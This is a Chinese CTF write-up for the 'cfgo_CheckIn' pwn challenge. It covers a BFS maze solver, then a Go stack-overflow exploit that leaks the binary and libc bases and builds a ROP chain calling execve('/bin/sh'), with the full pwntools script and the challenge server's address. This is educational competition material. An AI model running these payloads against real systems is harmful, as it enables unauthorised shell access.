这次比赛的pwn题貌似都不错,本次写下其中cfgo_CheckIn的题解

思路

首先有upx,但是我直接用命令脱壳后发现其实还是不太行,不过好歹可以看代码了。

You will get flag when reaching level 100. Now is level 1
⬛⬛⬛⬛⬛⬛
⬛⬛⬛⬛⬛⬛
⬛⬜⬛🚩⬛⬛
⬛⬜⬛⬜⬛⬛
⬛⬜⬜😂⬛⬛
⬛⬛⬛⬛⬛⬛

通过运行我们发现,只有一个输入点,程序让我们走100关的迷宫,然后在输入点我们进行了fuzz测试,发现没啥洞。
那估计就真的是让我们走100关迷宫了。
经过测试,每加一关,迷宫的长跟宽都+1,手走迷宫的思路基本拉闸。

写走迷宫算法

本次算法主要用了广度优先来实现。

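MAX_VALUE = 0x7fffffff  # kept for callers; bfs() below uses predecessor links as its visited mark


class Point(object):
    """A maze cell addressed by row (x) and column (y)."""

    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y

    def __repr__(self):
        return "Point(%d, %d)" % (self.x, self.y)


# Output channel of bfs(): row and column of every cell on the found path,
# in walking order from the start cell to the goal cell.
flag_x = []
flag_y = []


def bfs(maze, begin, end):
    """Find a shortest path through *maze* from *begin* to *end*.

    Args:
        maze: 2-D grid (list of rows or numpy array); a cell equal to '#' is
            a wall, any other value is walkable.
        begin: Point with the start cell (row = x, column = y).
        end: Point with the goal cell.

    Returns:
        The path as a list of Point objects, start cell first, goal cell last.
        The same coordinates are also appended to the module-level ``flag_x``
        / ``flag_y`` lists (the original calling convention).

    Raises:
        ValueError: if the maze is empty, a coordinate lies outside the grid,
            or the goal cannot be reached (the original crashed with an
            AttributeError on a None predecessor in that case).
    """
    # len() rather than truthiness: a numpy array has no boolean value.
    if len(maze) == 0 or len(maze[0]) == 0:
        raise ValueError("maze must have at least one row and one column")
    n, m = len(maze), len(maze[0])
    sx, sy = begin.x, begin.y
    gx, gy = end.x, end.y
    for (px, py) in ((sx, sy), (gx, gy)):
        if not (0 <= px < n and 0 <= py < m):
            raise ValueError("point (%d, %d) is outside the %dx%d maze" % (px, py, n, m))

    # Neighbour order: down, right, up, left.  It decides which of several
    # equally short paths is reported, so it is kept as in the original.
    steps = ((1, 0), (0, 1), (-1, 0), (0, -1))
    # pre[r][c] is the cell we came from; a non-None entry means "visited".
    pre = [[None] * m for _ in range(n)]
    pre[sx][sy] = (sx, sy)  # the start points at itself so it reads as visited
    found = (sx, sy) == (gx, gy)
    queue = deque([(sx, sy)])
    while queue and not found:
        cx, cy = queue.popleft()
        for dx, dy in steps:
            nx, ny = cx + dx, cy + dy
            if not (0 <= nx < n and 0 <= ny < m):
                continue
            if maze[nx][ny] == '#' or pre[nx][ny] is not None:
                continue
            pre[nx][ny] = (cx, cy)
            queue.append((nx, ny))
            if (nx, ny) == (gx, gy):
                found = True
                break
    if not found:
        raise ValueError("no path from (%d, %d) to (%d, %d)" % (sx, sy, gx, gy))

    # Walk the predecessor chain back from the goal, then reverse it.
    cells = []
    cur = (gx, gy)
    while cur != (sx, sy):
        cells.append(cur)
        cur = pre[cur[0]][cur[1]]
    cells.append((sx, sy))
    cells.reverse()

    path = [Point(r, c) for r, c in cells]
    flag_x.extend(r for r, _ in cells)
    flag_y.extend(c for _, c in cells)
    return path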

其中的参数为
maze:迷宫的地图(列表)
其中’#’表示墙,’.’表示可走的路,’S’表示起点,’G’表示终点
begin:起点坐标
end:终点坐标
flag_x:存每次走的x坐标
flag_y:存每次走的y坐标
这样我们就可以实现,传入一个迷宫地图与起点终点,输出路径的坐标

制作maze

这里我们接收到i+6个以’\n’分隔的行,得到一个列表,再将列表拼接为字符串
这里不使用p.recv()的原因是它的缓冲区只有一页内存,当数据过大时就接收不全了。

# Wait for the banner of level i+1, then read the i+6 lines of the rendered
# maze and join them back into one string.  recvlines() is used instead of a
# single recv() because, per the write-up, one recv() stops at a page of data
# and the larger mazes exceed that.
p.recvuntil("Now is level " + str(i + 1) + '\n')
source = '\n'.join(p.recvlines(i + 6))

然后我们计算起点到(0,0)的个数,这里由于起点的大小是4个字节,并且最后两个字节是变化的,所以我将所有的变化都捕捉下来,写入判断
(所以代码写的有点奥里给)

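#----计算起点到(0,0)的个数
# Row-major cell index of the start marker.  Every ordinary cell (⬛ / ⬜) is
# 3 bytes of UTF-8 while the start face and the flag 🚩 are 4 bytes, so
# (byte offset - newlines before it) // 3 is the cell index (floor division
# absorbs the one extra byte of a preceding 4-byte char).
# The start face changes per level but every face seen by the author starts
# with the bytes F0 9F, so one scan for that prefix replaces the per-emoji
# if-chain -- whose 😮 branch tested for 98 AE but computed with 90 AE.
# str is bytes here (Python 2), hence the escaped byte sequences.
flag_bytes = "\xf0\x9f\x9a\xa9"  # 🚩, the only other 4-byte char in the grid
start_pos = -1
scan_from = 0
while True:
    hit = source.find("\xf0\x9f", scan_from)
    if hit == -1:
        break
    if source[hit:hit + 4] != flag_bytes:
        start_pos = hit
        break
    scan_from = hit + 4
if start_pos == -1:
    # Fail loudly: the old chain left `orgin` at the previous level's value.
    raise ValueError("start marker not found in maze text")
orgin = (start_pos - source[:start_pos].count("\n")) // 3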

计算终点到(0,0)的长度

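# Row-major cell index of the goal flag, same arithmetic as for the start
# marker (3 bytes per square cell, newlines skipped, floor division).
flag_pos = source.find("🚩")
if flag_pos == -1:
    # Without this check find() == -1 silently produced a garbage index.
    raise ValueError("goal flag not found in maze text")
final = (flag_pos - source[:flag_pos].count("\n")) // 3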

将起点改为’S’,终点改为’G’,路改为’.’,墙壁改为’#’,将字符串改为列表以便满足maze属性。

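# Rewrite the rendered maze into whitespace-separated cell tokens:
# '#' wall, 'S' start, '.' floor, 'G' goal.  bfs() only looks at '#'.
source = source.replace("⬛", '#  ')

# The start face varies per level, so every face the author observed is
# mapped to 'S '.
source = source.replace("\xf0\x9f\x98\xaf", 'S ')
source = source.replace("\xf0\x9f\x98\x91", 'S ')
source = source.replace("\xf0\x9f\x98\x90", 'S ')
# ... the remaining face replacements are elided in the write-up ...
source = source.replace("\xf0\x9f\x98\x8f", 'S ')
source = source.replace("\xf0\x9f\x90\xae", 'S ')
source = source.replace("\xf0\x9f\x8d\xba", 'S ')

source = source.replace("⬜", '. ')
source = source.replace("\n", '\n\n')
migong = source.replace("🚩", 'G ')
#-----变为列表
# Split into one token per cell before building the array: np.array() of a
# single str is a 0-d array and reshape((x, x)) fails on it.  Pad a short
# grid with walls so the reshape always sees x*x cells (as the full exploit
# does).
migong = migong.split()
if len(migong) < x * x:
    migong.extend(["#"] * (x * x - len(migong)))
maze = np.array(migong).reshape((x, x))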

然后我们还需要得到起点与终点坐标

# Convert the row-major cell indices into (row, column) for the solver;
# x is the maze width.  divmod() is the integer-division / modulo pair the
# original computed with `/` and `%` (Python 2 integers).
begin.x, begin.y = divmod(orgin, x)
end.x, end.y = divmod(final, x)

测试

写个循环,调用bfs(maze, begin, end)就行。
然后我们需要得到路径字符串

# Translate the solved path (flag_x / flag_y, start cell first) into the
# game's move keys: 'a'/'d' step along the column, 'w'/'s' along the row.
flag2 = ''
for z in range(len(flag_x) - 1):
    row_step = flag_x[z] - flag_x[z + 1]
    col_step = flag_y[z] - flag_y[z + 1]
    if row_step == 0:
        flag2 += 'a' if col_step == 1 else 'd'
    else:
        flag2 += 'w' if row_step == 1 else 's'

这样我们就得到了。我们跑一跑测试一下。

size-(105, 104)
[*] Switching to interactive mode
You win!!!
Leave your name:
$

What?说好的flag呢,(黑人问号脸)
不过至少说明了我们的方向是对的。

栈溢出

经过测试这个是栈溢出的洞,首先测试偏移
我们使用cyclic打印出300个字节出来,直接打进去

'runtime: unexpected return pc for nArxBHup called from 0x6361617463616173\n'
'stack: frame={sp:0xc000049d28, fp:0xc000049e90} stack=[0xc000049000,0xc00004a000)\n'
'000000c000049c28: 0000000000000000 000000c00009a000 \n'
'000000c000049c38: 000000000000012d 00007f728c221b60 \n'
'000000c000049c48: 000000c000049ce8 00005578eff29307 <j5i9C80CBynqdZfW+2215> \n'
'000000c000049c58: 000000c000049cc8 0000000000000127 \n'
'000000c000049c68: 000000c00009c000 00007f728c221b60 \n'
'000000c000049c78: 0000000000000001 010100000000012c \n'
'000000c000049c88: 0000000000000000 6261616762616166 \n'

通过打印的错误结果我们可以看到,程序进行了不正常的调用,地址为0x6361617463616173
我们使用cyclic -l 0x63616173来得出偏移为272
但是现在的问题是,程序保护是全开的,栈溢出只有一次,那么我们可以想到被覆盖的空间里有猫腻。
通过测试我们发现0x119389是程序执行ret的偏移
偏移为112处有一个函数指针,并且偏移为120的值是不可变的,为下面打印函数的第一个参数
可以打印处其中指针内的值。
下面是112偏移处的取值

RSI  0x6261616562616164 ('daabeaab')
0x55cf79fdd747 movdqu xmm0, xmmword ptr [rsi]
0x55cf79fdd74b movdqu xmm1, xmmword ptr [rsi + rbx - 0x10]
0x55cf79fdd751 movdqu xmmword ptr [rdi], xmm0
0x55cf79fdd755 movdqu xmmword ptr [rdi + rbx - 0x10], xmm1
0x55cf79fdd75b ret

现在我们将偏移为112处改为0xc000049af0(里面存有程序地址)
接下来只需要寻找如何让程序返回到函数头
经过测试,我们找到text_addr+0x1190f0处,程序返回。
在这里我们需要爆破半个字节
最终payload

/bin/sh\x00"+"a"*104+p64(0xc000049af0)+p64(0x20)+'/bin/sh\x00'+'a'*0x88+'\xf0\xd0'

这些/bin/sh没所谓
如果成功后,我们就能得到程序地址并且重新获得输入
计算基地址

# Six leaked bytes, zero-padded to a qword for u64(); the two constants are
# the offsets the write-up derived to get back to the binary's load base.
leaked = p.recv(6).ljust(8, "\x00")
text_addr = u64(leaked) - 0x32398 - 0x52000

接下来就简单了,我们需要获取远程libc地址
经过远程测试,远程为libc.2.31,

.text:00000000000FFE25                 mov     rdi, [rsp+arg_8]
.text:00000000000FFE2A mov rsi, [rsp+arg_10]
.text:00000000000FFE2F mov rdx, [rsp+arg_18]
.text:00000000000FFE34 mov rax, [rsp+arg_0]
.text:00000000000FFE39 syscall

我们可以利用本段来执行execve(‘/bin/sh’,0,0)

exp:

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
import numpy as np
from collections import deque
import re
import os

context.arch = "amd64"   # pwntools target architecture
elf = ELF("pwn2")        # challenge binary (loaded once, used by pwntools helpers)
p = 0                    # connection tube; (re)bound by pwn(), closed by the __main__ retry loop
MAX_VALUE = 2 ** 31 - 1  # 0x7fffffff, the "unvisited" distance sentinel

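class Point(object):
    """A maze cell addressed by row (x) and column (y)."""

    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y

    def __repr__(self):
        return "Point(%d, %d)" % (self.x, self.y)


# Output channel of bfs(): row and column of every cell on the found path,
# in walking order from the start cell to the goal cell.
flag_x = []
flag_y = []


def bfs(maze, begin, end):
    """Find a shortest path through *maze* from *begin* to *end*.

    Args:
        maze: 2-D grid (list of rows or numpy array); a cell equal to '#' is
            a wall, any other value is walkable.
        begin: Point with the start cell (row = x, column = y).
        end: Point with the goal cell.

    Returns:
        The path as a list of Point objects, start cell first, goal cell last.
        The same coordinates are also appended to the module-level ``flag_x``
        / ``flag_y`` lists (the original calling convention).

    Raises:
        ValueError: if the maze is empty, a coordinate lies outside the grid,
            or the goal cannot be reached (the original crashed with an
            AttributeError on a None predecessor in that case).
    """
    # len() rather than truthiness: a numpy array has no boolean value.
    if len(maze) == 0 or len(maze[0]) == 0:
        raise ValueError("maze must have at least one row and one column")
    n, m = len(maze), len(maze[0])
    sx, sy = begin.x, begin.y
    gx, gy = end.x, end.y
    for (px, py) in ((sx, sy), (gx, gy)):
        if not (0 <= px < n and 0 <= py < m):
            raise ValueError("point (%d, %d) is outside the %dx%d maze" % (px, py, n, m))

    # Neighbour order: down, right, up, left.  It decides which of several
    # equally short paths is reported, so it is kept as in the original.
    steps = ((1, 0), (0, 1), (-1, 0), (0, -1))
    # pre[r][c] is the cell we came from; a non-None entry means "visited",
    # which replaces the MAX_VALUE distance sentinel of the original.
    pre = [[None] * m for _ in range(n)]
    pre[sx][sy] = (sx, sy)  # the start points at itself so it reads as visited
    found = (sx, sy) == (gx, gy)
    queue = deque([(sx, sy)])
    while queue and not found:
        cx, cy = queue.popleft()
        for dx, dy in steps:
            nx, ny = cx + dx, cy + dy
            if not (0 <= nx < n and 0 <= ny < m):
                continue
            if maze[nx][ny] == '#' or pre[nx][ny] is not None:
                continue
            pre[nx][ny] = (cx, cy)
            queue.append((nx, ny))
            if (nx, ny) == (gx, gy):
                found = True
                break
    if not found:
        raise ValueError("no path from (%d, %d) to (%d, %d)" % (sx, sy, gx, gy))

    # Walk the predecessor chain back from the goal, then reverse it.
    cells = []
    cur = (gx, gy)
    while cur != (sx, sy):
        cells.append(cur)
        cur = pre[cur[0]][cur[1]]
    cells.append((sx, sy))
    cells.reverse()

    path = [Point(r, c) for r, c in cells]
    flag_x.extend(r for r, _ in cells)
    flag_y.extend(c for _, c in cells)
    return path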



def pwn(ip,port,debug):
    """Solve the 100 maze levels, then run the overflow stage described in the write-up.

    Args:
        ip, port: remote endpoint; used only when debug != 1.
        debug: 1 runs ./pwn2 locally, anything else connects to ip:port.

    Side effects: rebinds the module-level tube ``p`` and drains the
    module-level ``flag_x`` / ``flag_y`` path lists after every level.
    NOTE: the body relies on Python 2 semantics (str is bytes, ``/`` on ints is
    integer division, print statements); it does not run under Python 3.
    Indentation was lost in the published listing and has been reconstructed.
    """
    global p
    if(debug == 1):
        p = process('./pwn2')
    else:
        p = remote(ip,port)
    for i in range(100):
        # Level i+1 is rendered as i+6 lines; recvlines() rather than recv()
        # so a large maze is not cut off at the receive buffer (see write-up).
        p.recvuntil("Now is level "+str(i+1)+'\n')
        source=p.recvlines(i+6)
        source='\n'.join(source)
        # Matches every 4-byte emoji (F0 9F xx xx); computed but not used below.
        pattern = re.compile(r"\xf0\x9f..")
        result = pattern.findall(source)
        #print source
        #print result
        # Grid width: the first line is one row at 3 UTF-8 bytes per square
        # cell (integer division absorbs the extra byte of a 4-byte emoji).
        x=(source.find("\n"))/3
        # Newline count, one less than the number of rows; only printed.
        y=source.count("\n")
        # Locate the start face.  Its last two UTF-8 bytes vary per level, so
        # every face the author observed is tried in turn; `orgin` becomes the
        # row-major cell index (byte offset minus preceding newlines, over 3).
        # NOTE(review): when no branch matches, `orgin` silently keeps the
        # previous level's value (and is unbound on level 1).
        if source.find("\xf0\x9f\x98\x82")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x82")-source[0:source.find("\xf0\x9f\x98\x82")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x85")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x85")-source[0:source.find("\xf0\x9f\x98\x85")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x81")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x81")-source[0:source.find("\xf0\x9f\x98\x81")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x80")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x80")-source[0:source.find("\xf0\x9f\x98\x80")].count("\n"))/3
        if source.find("\xf0\x9f\x99\x82")!=-1:
            orgin=(source.find("\xf0\x9f\x99\x82")-source[0:source.find("\xf0\x9f\x99\x82")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x90")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x90")-source[0:source.find("\xf0\x9f\x98\x90")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x91")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x91")-source[0:source.find("\xf0\x9f\x98\x91")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xaf")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xaf")-source[0:source.find("\xf0\x9f\x98\xaf")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x9f")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x9f")-source[0:source.find("\xf0\x9f\x98\x9f")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x9e")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x9e")-source[0:source.find("\xf0\x9f\x98\x9e")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x96")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x96")-source[0:source.find("\xf0\x9f\x98\x96")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xb3")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xb3")-source[0:source.find("\xf0\x9f\x98\xb3")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xa8")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xa8")-source[0:source.find("\xf0\x9f\x98\xa8")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xb1")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xb1")-source[0:source.find("\xf0\x9f\x98\xb1")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xad")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xad")-source[0:source.find("\xf0\x9f\x98\xad")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xb5")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xb5")-source[0:source.find("\xf0\x9f\x98\xb5")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xa9")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xa9")-source[0:source.find("\xf0\x9f\x98\xa9")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xa0")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xa0")-source[0:source.find("\xf0\x9f\x98\xa0")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xa1")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xa1")-source[0:source.find("\xf0\x9f\x98\xa1")].count("\n"))/3
        if source.find("\xf0\x9f\x99\x83")!=-1:#---------------
            orgin=(source.find("\xf0\x9f\x99\x83")-source[0:source.find("\xf0\x9f\x99\x83")].count("\n"))/3
        if source.find("\xf0\x9f\x98\xa4")!=-1:
            orgin=(source.find("\xf0\x9f\x98\xa4")-source[0:source.find("\xf0\x9f\x98\xa4")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x8f")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x8f")-source[0:source.find("\xf0\x9f\x98\x8f")].count("\n"))/3
            # The listing's indentation is lost; these debug prints inspect the
            # same marker, so they are assumed to belong to this branch.
            print "source.find=",source.find("\xf0\x9f\x98\x8f")
            print "source.count=",source[0:source.find("\xf0\x9f\x98\x8f")].count("\n")
        if source.find("\xf0\x9f\x98\x92")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x92")-source[0:source.find("\xf0\x9f\x98\x92")].count("\n"))/3
        # NOTE(review): this branch tests for the 98 AE face but computes with
        # the 90 AE bytes; if the 98 AE face is the start marker, find()
        # returns -1 and `orgin` is wrong.
        if source.find("\xf0\x9f\x98\xae")!=-1:
            orgin=(source.find("\xf0\x9f\x90\xae")-source[0:source.find("\xf0\x9f\x90\xae")].count("\n"))/3
        if source.find("\xf0\x9f\x98\x8f")!=-1:
            orgin=(source.find("\xf0\x9f\x98\x8f")-source[0:source.find("\xf0\x9f\x98\x8f")].count("\n"))/3
        if source.find("\xf0\x9f\x90\xae")!=-1:
            orgin=(source.find("\xf0\x9f\x90\xae")-source[0:source.find("\xf0\x9f\x90\xae")].count("\n"))/3
        if source.find("\xf0\x9f\x8d\xba")!=-1:
            orgin=(source.find("\xf0\x9f\x8d\xba")-source[0:source.find("\xf0\x9f\x8d\xba")].count("\n"))/3

        # Goal flag: same cell-index arithmetic as for the start marker.
        final=(source.find("🚩")-source[0:source.find("🚩")].count("\n"))/3
        # Rewrite the rendering into whitespace-separated cell tokens:
        # '#' wall, 'S' start, '.' floor, 'G' goal.  bfs() only looks at '#'.
        source=source.replace("⬛" , '# ')

        source=source.replace("\xf0\x9f\x98\xaf",'S ')
        source=source.replace("\xf0\x9f\x98\x91",'S ')
        source=source.replace("\xf0\x9f\x98\x90",'S ')
        source=source.replace("\xf0\x9f\x99\x82",'S ')
        source=source.replace("\xf0\x9f\x98\x80",'S ')
        source=source.replace("\xf0\x9f\x98\x81",'S ')
        source=source.replace("\xf0\x9f\x98\x82",'S ')
        source=source.replace("\xf0\x9f\x98\x85",'S ')
        source=source.replace("\xf0\x9f\x98\x9f",'S ')
        source=source.replace("\xf0\x9f\x98\x9e",'S ')
        source=source.replace("\xf0\x9f\x98\x96",'S ')
        source=source.replace("\xf0\x9f\x98\xb3",'S ')
        source=source.replace("\xf0\x9f\x98\xa8",'S ')
        source=source.replace("\xf0\x9f\x98\xb1",'S ')
        source=source.replace("\xf0\x9f\x98\xad",'S ')
        source=source.replace("\xf0\x9f\x98\xb5",'S ')
        source=source.replace("\xf0\x9f\x98\xa9",'S ')
        source=source.replace("\xf0\x9f\x98\xa0",'S ')
        source=source.replace("\xf0\x9f\x98\xa1",'S ')#----------
        source=source.replace("\xf0\x9f\x98\xa4",'S ')
        source=source.replace("\xf0\x9f\x99\x83",'S ')
        source=source.replace("\xf0\x9f\x98\x8f",'S ')
        source=source.replace("\xf0\x9f\x98\x92",'S ')
        source=source.replace("\xf0\x9f\x90\xae",'S ')
        source=source.replace("\xf0\x9f\x98\x8f",'S ')
        source=source.replace("\xf0\x9f\x90\xae",'S ')
        source=source.replace("\xf0\x9f\x8d\xba",'S ')

        source=source.replace("⬜",'. ')
        source=source.replace("\n",'\n\n')
        migong=source.replace("🚩",'G ')
        # Row/column of start and goal as strings; computed but not used.
        orgin_fin=str((orgin/x))+str(orgin%x)
        final_fin=str((final/x))+str(final%x)
        # One token per cell; pad with walls so reshape((x, x)) always sees
        # x*x cells.
        migong=migong.split()
        if len(migong)<x*x:
            for ww in range(x*x-len(migong)):
                migong.append("#")
        #print "orgin=",orgin
        #print "final=",final
        print('size-(%d, %d)' % (x, y))
        #print('orgin-(%d, %d)' % (orgin/x, orgin%x))
        #print('final-(%d, %d)' % (final/x, final%x))
        #pause()
        maze = np.array(migong).reshape((x,x))
        #np.set_printoptions(threshold=np.inf)
        #print maze
        flag=""  # unused
        begin = Point()
        end = Point()
        # Row-major cell index -> (row, column).
        begin.x = orgin/x
        begin.y = orgin%x
        end.x = final/x
        end.y = final%x
        # Fills flag_x / flag_y with the path cells, start cell first.
        bfs(maze, begin, end)
        #print flag_x
        #print flag_y

        # Turn consecutive path cells into the game's move keys:
        # 'a'/'d' change the column (y), 'w'/'s' change the row (x).
        flag2=''
        for z in range(len(flag_x)-1):
            if flag_x[z]-flag_x[z+1]==0:
                if flag_y[z]-flag_y[z+1]==1:
                    flag2+='a'
                else:
                    flag2+='d'
            else:
                if flag_x[z]-flag_x[z+1]==1:
                    flag2+='w'
                else:
                    flag2+='s'
        #print flag2
        p.sendline(flag2)
        # Reset the shared path lists before the next level.
        flag_x[:]=[]
        flag_y[:]=[]
    # After level 100 the binary asks for a name; from here on the function
    # follows the overflow sequence described in the write-up.
    p.recvuntil("Leave your name:\n")
    #context.log_level = 'debug'
    p.sendline("/bin/sh\x00"+"a"*104+p64(0xc000049af0)+p64(0x20)+'/bin/sh\x00'+'a'*0x88+'\xf0\xd0')#0xc000049e88

    # The echoed name leaks 6 bytes of a code pointer; the two constants
    # (from the write-up) turn it into the binary's load base.
    p.recvuntil("ame is : ")
    text_addr=u64(p.recv(6).ljust(8,"\x00"))-0x32398-0x52000
    p.recvuntil("Leave your name:\n")
    #gdb.attach(p,"b* $rebase(0x119389)")
    p.sendline("/bin/sh\x00"+"a"*104+p64(text_addr+0x1eefd0)+p64(0x20)+'/bin/sh\x00'+'a'*0x88+p64(text_addr+0x1190f0))#0xc000049e88

    # Second leak, resolved against the shipped libc.so.6 (the subtraction
    # below treats it as the address of __libc_start_main).
    p.recvuntil("ame is : ")
    libc_addr=u64(p.recv(6).ljust(8,"\x00"))
    print "libc_addr=",hex(libc_addr)
    libc=ELF("./libc.so.6")
    libcbase_addr=libc_addr-libc.symbols['__libc_start_main']
    system_addr=libcbase_addr+libc.symbols["system"]
    #binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
    #pop_rdi_ret=libcbase_addr+0x026b72
    binsh_addr=libcbase_addr+0x1b75aa
    pop_rdi_ret=text_addr+0x109d3d
    ret_addr=text_addr+0x72016
    print "libcbase_addr=",hex(libcbase_addr)
    print "binsh_addr=",hex(binsh_addr)
    print "pop_rdi_ret=",hex(pop_rdi_ret)
    print "system_addr=",hex(system_addr)
    #gdb.attach(p,"b* $rebase(0x119389)")
    p.recvuntil("Leave your name:\n")
    # NOTE(review): this first chain is dead code -- it is overwritten on the
    # next line, so ret_addr / pop_rdi_ret / system_addr are never sent.
    ROP=p64(ret_addr)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
    ROP=p64(text_addr+0xffe25)+p64(0)+p64(59)
    ROP+=p64(binsh_addr)+p64(0)+p64(0)
    p.sendline(p64(binsh_addr)*14+p64(0xc000049af0)+p64(0x20)+p64(binsh_addr)*18+ROP)#0xc000049e88

    p.interactive()
if __name__ == '__main__':
    # Keep retrying until a run completes: a failed attempt drops the
    # connection, which surfaces as EOFError.  With debug=1 the ip/port
    # arguments are ignored and ./pwn2 is run locally.
    while True:
        try:
            pwn('81.68.174.63', 62176, 1)
        except EOFError:
            p.close()

总结

这个题还是花了我很长时间的,归根到底还是我的算法水平太次,写迷宫花费了太长时间
以后要多学学编程了。。